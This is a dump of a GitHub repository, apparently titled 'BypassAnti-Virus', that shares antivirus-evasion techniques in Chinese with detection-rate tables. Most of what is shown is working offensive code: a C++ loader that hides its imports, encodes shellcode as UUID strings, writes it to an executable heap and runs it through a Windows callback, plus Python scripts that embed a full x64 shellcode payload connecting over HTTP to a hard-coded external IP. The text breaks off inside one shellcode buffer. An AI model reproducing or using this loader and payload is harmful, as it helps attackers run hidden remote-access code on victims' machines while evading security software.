├── callback ├── v0.1 │ ├── main.cpp │ └── trans.py ├── v0.2 │ ├── main.cpp │ ├── Base64.h │ └── trans.py ├── v0.3 │ ├── main.cpp │ └── trans.py ├── v0.4 │ ├── main.cpp │ └── trans.py ├── v0.5 │ ├── trans.py │ └── main.cpp └── README.md ├── images ├── image-common-1.png ├── image-common-2.png ├── image-callback-1.png ├── image-callback-2.png ├── image-callback-3.png ├── image-callback-4.png ├── image-callback-5.png ├── image-import-tables-1.png ├── image-import-tables-2.png └── image-import-tables-3.png ├── hide_Import_tables ├── v0.2 │ ├── main.cpp │ ├── Base64.h │ └── trans.py ├── v0.4 │ ├── main.cpp │ └── trans.py ├── v0.1 │ ├── main.cpp │ └── trans.py ├── v0.5 │ ├── trans.py │ └── main.cpp ├── v0.3 │ ├── trans.py │ └── main.cpp └── README.md ├── common └── VS中运行去除黑框.md └── README.md /callback/v0.1/main.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/midisec/BypassAnti-Virus/HEAD/callback/v0.1/main.cpp -------------------------------------------------------------------------------- /callback/v0.2/main.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/midisec/BypassAnti-Virus/HEAD/callback/v0.2/main.cpp -------------------------------------------------------------------------------- /callback/v0.3/main.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/midisec/BypassAnti-Virus/HEAD/callback/v0.3/main.cpp -------------------------------------------------------------------------------- /callback/v0.4/main.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/midisec/BypassAnti-Virus/HEAD/callback/v0.4/main.cpp -------------------------------------------------------------------------------- /images/image-common-1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/midisec/BypassAnti-Virus/HEAD/images/image-common-1.png -------------------------------------------------------------------------------- /images/image-common-2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/midisec/BypassAnti-Virus/HEAD/images/image-common-2.png -------------------------------------------------------------------------------- /images/image-callback-1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/midisec/BypassAnti-Virus/HEAD/images/image-callback-1.png -------------------------------------------------------------------------------- /images/image-callback-2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/midisec/BypassAnti-Virus/HEAD/images/image-callback-2.png -------------------------------------------------------------------------------- /images/image-callback-3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/midisec/BypassAnti-Virus/HEAD/images/image-callback-3.png -------------------------------------------------------------------------------- /images/image-callback-4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/midisec/BypassAnti-Virus/HEAD/images/image-callback-4.png -------------------------------------------------------------------------------- /images/image-callback-5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/midisec/BypassAnti-Virus/HEAD/images/image-callback-5.png -------------------------------------------------------------------------------- /hide_Import_tables/v0.2/main.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/midisec/BypassAnti-Virus/HEAD/hide_Import_tables/v0.2/main.cpp -------------------------------------------------------------------------------- /hide_Import_tables/v0.4/main.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/midisec/BypassAnti-Virus/HEAD/hide_Import_tables/v0.4/main.cpp -------------------------------------------------------------------------------- /images/image-import-tables-1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/midisec/BypassAnti-Virus/HEAD/images/image-import-tables-1.png -------------------------------------------------------------------------------- /images/image-import-tables-2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/midisec/BypassAnti-Virus/HEAD/images/image-import-tables-2.png -------------------------------------------------------------------------------- /images/image-import-tables-3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/midisec/BypassAnti-Virus/HEAD/images/image-import-tables-3.png -------------------------------------------------------------------------------- /common/VS中运行去除黑框.md: -------------------------------------------------------------------------------- 1 | # VS运行去除黑框 2 | 3 | 项目->链接器->系统->改成窗口,默认的是控制器。 4 | 5 | ![image-20220217183252141](../images/image-common-1.png) 6 | 7 | 8 | 9 | 项目->链接器->入口点改成mainCRTStartup 10 | 11 | ![image-20220217183205834](../images/image-common-2.png) -------------------------------------------------------------------------------- /callback/v0.2/Base64.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | // Base64.h 3 | #ifndef __BASE64_H__ 4 | #define __BASE64_H__ 5 | 6 | #include 7 | using std::string; 8 | 9 | class CBase64 10 | { 11 | public: 12 | static bool Encode(const string& strIn, string& strOut); 13 | static bool Decode(const string& strIn, string& strOut, bool fCheckInputValid = false); 14 | }; 15 | 16 | #endif -------------------------------------------------------------------------------- /hide_Import_tables/v0.2/Base64.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | // Base64.h 3 | #ifndef __BASE64_H__ 4 | #define __BASE64_H__ 5 | 6 | #include 7 | using std::string; 8 | 9 | class CBase64 10 | { 11 | public: 12 | static bool Encode(const string& strIn, string& strOut); 13 | static bool Decode(const string& strIn, string& strOut, bool fCheckInputValid = false); 14 | }; 15 | 16 | #endif -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Bypass Anti-Virus 2 | 3 | **我也是一个小白,很喜欢免杀技术,自己琢磨、研究、复现了几种绕过杀软的姿势,分享给大家。** 4 | 5 | **郑重声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!** 6 | 7 | 8 | 9 | ## 上手指南 10 | 11 | 通过下表选择你感兴趣的免杀方式 12 | 13 | | 序号 | 免杀方式 | VT查杀率(avg) | 时间 | 火绒 | 360 | 腾讯 | 代码实现 | 14 | | ---- | ------------------------------------------------------------ | ------------- | ---------- | ---- | ---- | ---- | -------- | 15 | | 1 | [回调函数(及改进)](https://github.com/midisec/BypassAnti-Virus/tree/main/callback) | 2/68 | 2022-02-18 | √ | √ | √ | c++ | 16 | | 2 | [隐藏导入表](https://github.com/midisec/BypassAnti-Virus/tree/main/hide_Import_tables) | 8/68 | 2022-07-10 | √ | √ | √ | c++ | 17 | | 3 | | | | | | | | 18 | 19 | 20 | 21 | 22 | 23 | ## 更新消息 24 | 25 | 2022-02-18 26 | 27 | * 通过[回调函数](https://github.com/midisec/BypassAnti-Virus/tree/main/callback)加载恶意shellcode(c++) 28 | * 新增UUID方式,通过回调函数加载shellcode(c++) 29 | * 新增BASE64编码+UUID方式,通过回调函数加载shellcode(c++) 30 | 31 | 2022-02-21 32 | 33 | * 新增[IPV6方式](https://github.com/midisec/BypassAnti-Virus/tree/main/callback/v0.3),通过回调函数加载shellcode(c++) 34 | * 新增[MAC方式](https://github.com/midisec/BypassAnti-Virus/tree/main/callback/v0.4),通过回调函数加载shellcode(c++) 35 | 36 | 2022-03-07 37 | * 新增[IPV4方式](https://github.com/midisec/BypassAnti-Virus/tree/main/callback/v0.5),通过回调函数加载shellcode(c++) 38 | 39 | 2022-03-08 40 | 41 | * 新增13种[可利用的回调函数](https://github.com/midisec/BypassAnti-Virus/tree/main/callback#%E5%8F%AF%E5%88%A9%E7%94%A8%E7%9A%84%E5%9B%9E%E8%B0%83%E5%87%BD%E6%95%B0)加载shellcode(c++) 42 | 43 | 2022-07-10 44 | 45 | * 通过[隐藏导入表的方式](https://github.com/midisec/BypassAnti-Virus/tree/main/hide_Import_tables)绕过部分敏感函数调用静态查杀(c++) 46 | 47 | 48 | 49 | ## 贡献者 50 | 51 | 52 | 53 | -------------------------------------------------------------------------------- /hide_Import_tables/v0.1/main.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #pragma comment(lib, "Rpcrt4.lib") 5 | 6 | 7 | const char* uuids[] = 8 | { 9 | "e48348fc-e8f0-00c8-0000-415141505251", "d2314856-4865-528b-6048-8b5218488b52", "728b4820-4850-b70f-4a4a-4d31c94831c0", "7c613cac-2c02-4120-c1c9-0d4101c1e2ed", "48514152-528b-8b20-423c-4801d0668178", "75020b18-8b72-8880-0000-004885c07467", "50d00148-488b-4418-8b40-204901d0e356", "41c9ff48-348b-4888-01d6-4d31c94831c0", "c9c141ac-410d-c101-38e0-75f14c034c24", "d1394508-d875-4458-8b40-244901d06641", "44480c8b-408b-491c-01d0-418b04884801", "415841d0-5e58-5a59-4158-4159415a4883", "524120ec-e0ff-4158-595a-488b12e94fff", "6a5dffff-4900-77be-696e-696e65740041", "e6894956-894c-41f1-ba4c-772607ffd548", "3148c931-4dd2-c031-4d31-c94150415041", "79563aba-ffa7-e9d5-9300-00005a4889c1", "01bbb841-0000-314d-c941-5141516a0341", "57ba4151-9f89-ffc6-d5eb-795b4889c148", "8949d231-4dd8-c931-5268-0032c0845252", "55ebba41-3b2e-d5ff-4889-c64883c3506a", "89485f0a-baf1-001f-0000-6a0068803300", "e0894900-b941-0004-0000-41ba75469e86", "8948d5ff-48f1-da89-49c7-c0ffffffff4d", "5252c931-ba41-062d-187b-ffd585c00f85", "0000019d-ff48-0fcf-848c-010000ebb3e9", "000001e4-82e8-ffff-ff2f-4c70584900df", "c70b55e6-190b-b44d-748f-06898a62178f", "21c88ac2-1ba0-3f2e-f9cf-4b3272e2e974", "f5326c2d-0ed2-b1ca-8a0a-c6f2f8ece05c", "62865e80-8d24-100a-51d6-daaf84ce8a8a", "1878faa7-bc97-50b0-0055-7365722d4167", "3a746e65-4d20-7a6f-696c-6c612f352e30", "6f632820-706d-7461-6962-6c653b204d53", "31204549-2e30-3b30-2057-696e646f7773", "20544e20-2e36-3b32-2057-4f5736343b20", "64697254-6e65-2f74-362e-303b204d4147", "29534a57-0a0d-ce00-758d-fb7ddbd6051b", "fa45c5cb-217e-e55f-c30b-88f322f42bf7", "6e5cfa55-debd-9931-bbef-1a1eeeb93ab1", "46b1bc56-8056-f1b3-7b88-93a2767a5995", "2d06674a-36cb-51b2-8583-b8fc5957e85b", "1fa25721-5fc0-1003-e185-04b060e6e7a7", "40325298-4744-61db-b711-425af22006b7", "ed269ac6-9a5e-87fd-9e73-66a9e9f595c7", "2d4d6374-13ab-f500-e680-00f469c855de", "2c779de6-1cb7-22af-e9a7-fc1c37e7e9d6", "30fe8ed1-21ae-dd9f-e9dc-62bcfdf26893", "e14c61ee-0e39-c60c-37a3-e3a427b172ec", "9cfbf3b0-7979-60f5-7773-cdc573610109", "7075c3b5-b1a9-a24e-0041-bef0b5a256ff", "c93148d5-00ba-4000-0041-b80010000041", "000040b9-4100-58ba-a453-e5ffd5489353", "e7894853-8948-48f1-89da-41b800200000", "41f98949-12ba-8996-e2ff-d54883c42085", "66b674c0-078b-0148-c385-c075d7585858", "00000548-0000-c350-e87f-fdffff312e31", "30382e35-312e-3230-0049-9602d2000000" 10 | }; 11 | 12 | 13 | typedef HANDLE(WINAPI* ImportHeapCreate)( 14 | _In_ DWORD flOptions, 15 | _In_ SIZE_T dwInitialSize, 16 | _In_ SIZE_T dwMaximumSize 17 | ); 18 | 19 | typedef LPVOID(WINAPI* ImportHeapAlloc)( 20 | _In_ HANDLE hHeap, 21 | _In_ DWORD dwFlags, 22 | _In_ SIZE_T dwBytes 23 | ); 24 | 25 | typedef RPC_STATUS(RPC_ENTRY* ImportUuidFromStringA)( 26 | _In_opt_ RPC_CSTR StringUuid, 27 | _Out_ UUID __RPC_FAR* Uuid 28 | ); 29 | 30 | 31 | int main() 32 | { 33 | ImportHeapCreate MyHeapCreate = (ImportHeapCreate)GetProcAddress(GetModuleHandle(TEXT("kernel32.dll")), "HeapCreate"); 34 | ImportHeapAlloc MyHeapAlloc = (ImportHeapAlloc)GetProcAddress(GetModuleHandle(TEXT("kernel32.dll")), "HeapAlloc"); 35 | 36 | HMODULE hModule = LoadLibraryA("RPCRT4.dll"); 37 | ImportUuidFromStringA MyUuidFromStringA = (ImportUuidFromStringA)GetProcAddress(hModule, "UuidFromStringA"); 38 | 39 | HANDLE hc = MyHeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0); 40 | void* ha = MyHeapAlloc(hc, 0, 0x100000); 41 | 42 | DWORD_PTR hptr = (DWORD_PTR)ha; 43 | int elems = sizeof(uuids) / sizeof(uuids[0]); 44 | 45 | for (int i = 0; i < elems; i++) { 46 | RPC_STATUS status = MyUuidFromStringA((RPC_CSTR)uuids[i], (UUID*)hptr); 47 | if (status != RPC_S_OK) { 48 | CloseHandle(ha); 49 | return -1; 50 | } 51 | hptr += 16; 52 | } 53 | 54 | EnumChildWindows(NULL, (WNDENUMPROC)ha, 0); 55 | CloseHandle(ha); 56 | return 0; 57 | } -------------------------------------------------------------------------------- /callback/v0.5/trans.py: -------------------------------------------------------------------------------- 1 | import ipaddress 2 | 3 | 4 | buf = b'''\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xe9\x93\x00\x00\x00\x5a\x48\x89\xc1\x41\xb8\xbb\x01\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x79\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x32\xc0\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\xba\x1f\x00\x00\x00\x6a\x00\x68\x80\x33\x00\x00\x49\x89\xe0\x41\xb9\x04\x00\x00\x00\x41\xba\x75\x46\x9e\x86\xff\xd5\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xb3\xe9\xe4\x01\x00\x00\xe8\x82\xff\xff\xff\x2f\x6c\x7a\x36\x41\x00\xf7\x60\x59\x6d\x9c\x78\x07\x14\x7f\x90\x3c\xb5\xf2\xd1\x99\x9d\x91\xc2\x66\xc4\x6e\x17\x3f\xb8\x43\xb3\xee\x45\x28\xef\x8f\xce\x7b\x5b\x06\x91\x2c\x2e\xa4\x2a\xe7\x68\xde\xb9\xf2\x82\xde\xae\x9e\x91\xe7\xf5\x30\x38\x9f\x6b\xe4\x40\x5a\x07\xbc\xcf\x15\x91\x99\xe0\x5f\x94\x3e\x00\xa5\x0f\xfd\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x31\x30\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x32\x3b\x20\x57\x69\x6e\x36\x34\x3b\x20\x78\x36\x34\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x36\x2e\x30\x3b\x20\x4d\x41\x41\x52\x4a\x53\x29\x0d\x0a\x00\x71\xe4\xfb\xc4\x3a\xc6\x6a\x35\x0e\x94\xd6\xd4\x36\x78\xf7\x49\x9d\x55\x26\x95\xac\x46\xfb\x05\x6a\xf6\x58\x5c\x9f\x31\x8b\xee\x43\x2e\xf9\xf0\x8c\x6a\x48\x6a\xf0\xe8\x89\x88\x15\x32\x17\x6b\xe5\x58\x01\xb7\x6c\xb0\x96\xc4\x7f\x49\x51\x34\x28\x5e\xb9\x98\x7c\x4d\xba\x1c\xe2\x35\x45\x25\x71\xda\x4b\x1f\x7f\x67\xb7\x7d\x9e\xb0\xa8\x7f\x0b\xed\x8a\x5c\x12\xa9\x62\x5a\x09\x81\xb7\xb9\x10\xb3\x8b\xdd\x98\xe9\x6f\x62\x1e\xa9\x89\x2f\xfa\x9f\x26\x66\x16\xb1\x3b\xd0\xb0\xc3\x32\xb1\xe0\x0d\xf9\xa3\x41\x00\x23\xd0\x71\x71\xc0\x1a\x73\xf1\x40\x04\x3b\xae\x57\x16\x7c\x42\x0c\x48\x31\x97\x60\x7a\xac\x60\xc5\xc7\x85\x62\xba\xbc\xef\xfe\x62\xa4\x7d\x0e\x79\x75\x4b\x47\xb8\x6d\x42\x48\xdf\x4a\x33\x64\xd0\x86\x3b\x29\xb1\x9b\xde\xdc\x9a\xb6\xcc\x1c\x36\xde\x51\x0c\x4f\xa4\x83\x85\x85\xaf\x7d\x23\x1c\x56\xdb\x86\xbe\x91\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x7f\xfd\xff\xff\x31\x2e\x31\x35\x2e\x38\x30\x2e\x31\x30\x32\x00\x49\x96\x02\xd2''' # shellcode 5 | 6 | 7 | def convertToIPV4(shellcode): 8 | if len(shellcode)%4 !=0: 9 | print("\n[*] length:",len(shellcode)+(4-(len(shellcode)%4))) 10 | addNullbyte = b"\x00" * (4-(len(shellcode)%4)) 11 | shellcode += addNullbyte 12 | 13 | ipv4 = [] 14 | for i in range(0, len(shellcode), 4): 15 | ipv4.append(str(ipaddress.IPv4Address(shellcode[i:i+4]))) 16 | return ipv4 17 | 18 | 19 | if __name__ == '__main__': 20 | r = convertToIPV4(buf) 21 | print(str(r).replace("'","\"")) 22 | -------------------------------------------------------------------------------- /hide_Import_tables/v0.5/trans.py: -------------------------------------------------------------------------------- 1 | import ipaddress 2 | 3 | 4 | buf = b'''\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xe9\x93\x00\x00\x00\x5a\x48\x89\xc1\x41\xb8\xbb\x01\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x79\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x32\xc0\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\xba\x1f\x00\x00\x00\x6a\x00\x68\x80\x33\x00\x00\x49\x89\xe0\x41\xb9\x04\x00\x00\x00\x41\xba\x75\x46\x9e\x86\xff\xd5\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xb3\xe9\xe4\x01\x00\x00\xe8\x82\xff\xff\xff\x2f\x4c\x70\x58\x49\x00\xdf\xe6\x55\x0b\xc7\x0b\x19\x4d\xb4\x74\x8f\x06\x89\x8a\x62\x17\x8f\xc2\x8a\xc8\x21\xa0\x1b\x2e\x3f\xf9\xcf\x4b\x32\x72\xe2\xe9\x74\x2d\x6c\x32\xf5\xd2\x0e\xca\xb1\x8a\x0a\xc6\xf2\xf8\xec\xe0\x5c\x80\x5e\x86\x62\x24\x8d\x0a\x10\x51\xd6\xda\xaf\x84\xce\x8a\x8a\xa7\xfa\x78\x18\x97\xbc\xb0\x50\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x31\x30\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x32\x3b\x20\x57\x4f\x57\x36\x34\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x36\x2e\x30\x3b\x20\x4d\x41\x47\x57\x4a\x53\x29\x0d\x0a\x00\xce\x75\x8d\xfb\x7d\xdb\xd6\x05\x1b\xcb\xc5\x45\xfa\x7e\x21\x5f\xe5\xc3\x0b\x88\xf3\x22\xf4\x2b\xf7\x55\xfa\x5c\x6e\xbd\xde\x31\x99\xbb\xef\x1a\x1e\xee\xb9\x3a\xb1\x56\xbc\xb1\x46\x56\x80\xb3\xf1\x7b\x88\x93\xa2\x76\x7a\x59\x95\x4a\x67\x06\x2d\xcb\x36\xb2\x51\x85\x83\xb8\xfc\x59\x57\xe8\x5b\x21\x57\xa2\x1f\xc0\x5f\x03\x10\xe1\x85\x04\xb0\x60\xe6\xe7\xa7\x98\x52\x32\x40\x44\x47\xdb\x61\xb7\x11\x42\x5a\xf2\x20\x06\xb7\xc6\x9a\x26\xed\x5e\x9a\xfd\x87\x9e\x73\x66\xa9\xe9\xf5\x95\xc7\x74\x63\x4d\x2d\xab\x13\x00\xf5\xe6\x80\x00\xf4\x69\xc8\x55\xde\xe6\x9d\x77\x2c\xb7\x1c\xaf\x22\xe9\xa7\xfc\x1c\x37\xe7\xe9\xd6\xd1\x8e\xfe\x30\xae\x21\x9f\xdd\xe9\xdc\x62\xbc\xfd\xf2\x68\x93\xee\x61\x4c\xe1\x39\x0e\x0c\xc6\x37\xa3\xe3\xa4\x27\xb1\x72\xec\xb0\xf3\xfb\x9c\x79\x79\xf5\x60\x77\x73\xcd\xc5\x73\x61\x01\x09\xb5\xc3\x75\x70\xa9\xb1\x4e\xa2\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x7f\xfd\xff\xff\x31\x2e\x31\x35\x2e\x38\x30\x2e\x31\x30\x32\x00\x49\x96\x02\xd2''' # shellcode 5 | 6 | 7 | def convertToIPV4(shellcode): 8 | if len(shellcode)%4 !=0: 9 | print("\n[*] length:",len(shellcode)+(4-(len(shellcode)%4))) 10 | addNullbyte = b"\x00" * (4-(len(shellcode)%4)) 11 | shellcode += addNullbyte 12 | 13 | ipv4 = [] 14 | for i in range(0, len(shellcode), 4): 15 | ipv4.append(str(ipaddress.IPv4Address(shellcode[i:i+4]))) 16 | return ipv4 17 | 18 | 19 | if __name__ == '__main__': 20 | r = convertToIPV4(buf) 21 | print(str(r).replace("'","\"")) 22 | -------------------------------------------------------------------------------- /callback/v0.1/trans.py: -------------------------------------------------------------------------------- 1 | import uuid 2 | 3 | def convertToUUID(shellcode): 4 | if len(shellcode)%16 !=0: 5 | print("\n[*] length:",len(shellcode)+(16-(len(shellcode)%16))) 6 | addNullbyte = b"\x00" * (16-(len(shellcode)%16)) 7 | shellcode += addNullbyte 8 | 9 | uuids = [] 10 | for i in range(0,len(shellcode),16): 11 | uuidString = str(uuid.UUID(bytes_le=shellcode[i:i+16])) 12 | uuids.append(uuidString.replace("'","\"")) 13 | return uuids 14 | 15 | if __name__ == '__main__': 16 | buf = b'''\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xe9\x93\x00\x00\x00\x5a\x48\x89\xc1\x41\xb8\xbb\x01\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x79\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x32\xc0\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\xba\x1f\x00\x00\x00\x6a\x00\x68\x80\x33\x00\x00\x49\x89\xe0\x41\xb9\x04\x00\x00\x00\x41\xba\x75\x46\x9e\x86\xff\xd5\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xb3\xe9\xe4\x01\x00\x00\xe8\x82\xff\xff\xff\